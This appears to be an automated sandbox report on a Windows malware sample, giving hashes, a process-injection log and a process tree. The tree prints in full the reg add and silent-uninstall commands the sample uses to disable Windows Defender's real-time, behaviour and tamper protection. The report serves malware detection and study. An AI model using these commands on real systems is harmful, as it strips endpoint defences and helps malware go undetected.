Analysis
-
max time kernel
91s -
max time network
111s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
24-11-2020 12:48
Static task
static1
Behavioral task
behavioral1
Sample
20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
General
-
Target
20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe
-
Size
67KB
-
MD5
e3bc953a18fe466cb008184a45c6c858
-
SHA1
bcf4ffa92efac170177e5b8f9199bd8cf8c8d380
-
SHA256
20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b
-
SHA512
f0fd176cce8de8766f34b7d94e428173bdf83fa038611573aabb97dc78c01db3231aadd6fb1e8f0ebea1028238ded4eb8394db307f54fd9bb9eac8443936dc97
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 66 IoCs
Processes:
20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 656 wrote to memory of 584 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 584 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 584 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 3412 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 3412 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 3412 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 204 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 204 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 204 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 4080 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 4080 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 4080 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 3488 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 3488 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 3488 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 1520 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 1520 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 1520 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 2132 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 2132 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 2132 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 60 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 60 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 60 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 3936 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 3936 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 3936 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 1812 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 1812 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 1812 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 2204 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 2204 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 2204 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 912 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 912 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 912 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 196 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 196 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 656 wrote to memory of 196 656 20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe cmd.exe PID 1520 wrote to memory of 184 1520 cmd.exe reg.exe PID 1520 wrote to memory of 184 1520 cmd.exe reg.exe PID 1520 wrote to memory of 184 1520 cmd.exe reg.exe PID 4080 wrote to memory of 2392 4080 cmd.exe reg.exe PID 4080 wrote to memory of 2392 4080 cmd.exe reg.exe PID 4080 wrote to memory of 2392 4080 cmd.exe reg.exe PID 3488 wrote to memory of 940 3488 cmd.exe reg.exe PID 3488 wrote to memory of 940 3488 cmd.exe reg.exe PID 3488 wrote to memory of 940 3488 cmd.exe reg.exe PID 2132 wrote to memory of 976 2132 cmd.exe reg.exe PID 2132 wrote to memory of 976 2132 cmd.exe reg.exe PID 2132 wrote to memory of 976 2132 cmd.exe reg.exe PID 3936 wrote to memory of 3808 3936 cmd.exe reg.exe PID 3936 wrote to memory of 3808 3936 cmd.exe reg.exe PID 3936 wrote to memory of 3808 3936 cmd.exe reg.exe PID 60 wrote to memory of 1676 60 cmd.exe reg.exe PID 60 wrote to memory of 1676 60 cmd.exe reg.exe PID 60 wrote to memory of 1676 60 cmd.exe reg.exe PID 912 wrote to memory of 1664 912 cmd.exe reg.exe PID 912 wrote to memory of 1664 912 cmd.exe reg.exe PID 912 wrote to memory of 1664 912 cmd.exe reg.exe PID 196 wrote to memory of 4012 196 cmd.exe reg.exe PID 196 wrote to memory of 4012 196 cmd.exe reg.exe PID 196 wrote to memory of 4012 196 cmd.exe reg.exe PID 1812 wrote to memory of 3312 1812 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe"C:\Users\Admin\AppData\Local\Temp\20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Program Files\Microsoft Security Client\Setup.exe" /x /s2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Program Files(x86)\Microsoft Security Client\Setup.exe" /x /s2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Program Files\Microsoft Security Client\Setup.exe" /x /s2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpCloudBlockLevel" /t REG_DWORD /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpCloudBlockLevel" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /P "P:\Cebtenz Svyrf\Zvpebfbsg Frphevgl Pyvrag\Frghc.rkr" /k /f2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/60-7-0x0000000000000000-mapping.dmp
-
memory/184-13-0x0000000000000000-mapping.dmp
-
memory/196-12-0x0000000000000000-mapping.dmp
-
memory/204-2-0x0000000000000000-mapping.dmp
-
memory/584-0-0x0000000000000000-mapping.dmp
-
memory/912-11-0x0000000000000000-mapping.dmp
-
memory/940-15-0x0000000000000000-mapping.dmp
-
memory/976-16-0x0000000000000000-mapping.dmp
-
memory/1520-5-0x0000000000000000-mapping.dmp
-
memory/1664-19-0x0000000000000000-mapping.dmp
-
memory/1676-18-0x0000000000000000-mapping.dmp
-
memory/1812-9-0x0000000000000000-mapping.dmp
-
memory/2132-6-0x0000000000000000-mapping.dmp
-
memory/2204-10-0x0000000000000000-mapping.dmp
-
memory/2392-14-0x0000000000000000-mapping.dmp
-
memory/3312-21-0x0000000000000000-mapping.dmp
-
memory/3412-1-0x0000000000000000-mapping.dmp
-
memory/3488-4-0x0000000000000000-mapping.dmp
-
memory/3808-17-0x0000000000000000-mapping.dmp
-
memory/3936-8-0x0000000000000000-mapping.dmp
-
memory/4012-20-0x0000000000000000-mapping.dmp
-
memory/4080-3-0x0000000000000000-mapping.dmp